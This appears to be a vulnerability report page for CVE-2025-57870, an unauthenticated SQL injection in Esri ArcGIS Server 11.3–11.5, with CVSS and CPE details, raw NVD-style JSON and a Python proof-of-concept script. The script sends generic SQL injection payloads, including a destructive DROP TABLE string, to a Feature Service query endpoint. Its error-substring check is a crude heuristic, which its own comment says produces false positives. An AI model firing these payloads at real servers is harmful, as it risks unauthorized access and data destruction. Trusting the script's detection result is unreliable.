Security Vulnerability Report
CVE-2025-57870 CVSS 10.0 CRITICAL

CVE-2025-57870

Published: 2025-10-22 15:15:52
Last Modified: 2025-10-31 18:51:23

Description

A SQL Injection vulnerability exists in Esri ArcGIS Server versions 11.3, 11.4 and 11.5 on Windows, Linux and Kubernetes. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary SQL commands via a specific ArcGIS Feature Service operation. Successful exploitation can potentially result in unauthorized access, modification, or deletion of data from the underlying Enterprise Geodatabase.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:* - VULNERABLE (versionStartIncluding 11.3, versionEndIncluding 11.5)
cpe:2.3:a:kubernetes:kubernetes:-:*:*:*:*:*:*:* - NOT VULNERABLE (running-on platform; combined with the ArcGIS Server match by the AND operator)
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE (running-on platform; combined with the ArcGIS Server match by the AND operator)
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE (running-on platform; combined with the ArcGIS Server match by the AND operator)

Esri ArcGIS Server 11.3 (Windows/Linux/Kubernetes)
Esri ArcGIS Server 11.4 (Windows/Linux/Kubernetes)
Esri ArcGIS Server 11.5 (Windows/Linux/Kubernetes)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-57870 PoC - SQL Injection in Esri ArcGIS Server Feature Service
# Target: ArcGIS Server versions 11.3, 11.4, 11.5
# Note: For authorized security testing only


def test_sqli(target_url, service_endpoint):
    """Test for SQL injection vulnerability in ArcGIS Feature Service"""
    # Normal request for baseline
    normal_params = {
        'where': '1=1',
        'outFields': '*',
        'f': 'json'
    }

    # SQL injection payloads
    payloads = [
        "1' OR '1'='1",
        "1' UNION SELECT NULL--",
        "1'; DROP TABLE--",
        "1' AND 1=1--"
    ]

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    print(f"[*] Testing target: {target_url}")
    print(f"[*] Service endpoint: {service_endpoint}")

    # Test normal request
    try:
        response = requests.get(
            f"{target_url}/{service_endpoint}/query",
            params=normal_params,
            headers=headers,
            timeout=30
        )
        print(f"[+] Normal request status: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

    # Test SQL injection payloads
    for payload in payloads:
        sqli_params = {
            'where': payload,
            'outFields': '*',
            'f': 'json'
        }
        try:
            response = requests.get(
                f"{target_url}/{service_endpoint}/query",
                params=sqli_params,
                headers=headers,
                timeout=30
            )
            # Check for SQL error indicators.
            # Caveat: this substring check is a crude heuristic. A Feature Service
            # answers any malformed 'where' clause with a JSON "error" object, so a
            # match here shows only that the server rejected the clause, not that
            # the version is vulnerable; confirm the version against the advisory.
            if 'sql' in response.text.lower() or 'error' in response.text.lower():
                print(f"[!] Potential SQL injection detected with payload: {payload}")
                print(f"[!] Response preview: {response.text[:200]}")
                return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Error testing payload {payload}: {e}")

    print("[*] No obvious SQL injection detected")
    return False


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-57870-poc.py <target_url> <service_endpoint>")
        print("Example: python cve-2025-57870-poc.py https://arcgis.example.com/arcgis rest/services/Example/FeatureServer/0")
        sys.exit(1)
    target = sys.argv[1]
    endpoint = sys.argv[2]
    test_sqli(target, endpoint)

References

https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-feature-services-security-patch (Esri; tagged Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-57870",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-22T15:15:51.830",
    "lastModified": "2025-10-31T18:51:22.923",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A SQL Injection vulnerability exists in Esri ArcGIS Server versions 11.3, 11.4 and 11.5 on Windows, Linux and Kubernetes. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary SQL commands via a specific ArcGIS Feature Service operation. Successful exploitation can potentially result in unauthorized access, modification, or deletion of data from the underlying Enterprise Geodatabase."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 10.0,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "configurations": [
      {
        "operator": "AND",
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "11.3",
                "versionEndIncluding": "11.5",
                "matchCriteriaId": "B19FFADD-9CAD-438D-95BB-AA1C65EC2207"
              }
            ]
          },
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": false,
                "criteria": "cpe:2.3:a:kubernetes:kubernetes:-:*:*:*:*:*:*:*",
                "matchCriteriaId": "14C32308-314D-4E0D-B15F-6A68DF21E9F9"
              },
              {
                "vulnerable": false,
                "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*",
                "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"
              },
              {
                "vulnerable": false,
                "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*",
                "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-feature-services-security-patch",
        "source": "[email protected]",
        "tags": [
          "Mitigation",
          "Vendor Advisory"
        ]
      }
    ]
  }
}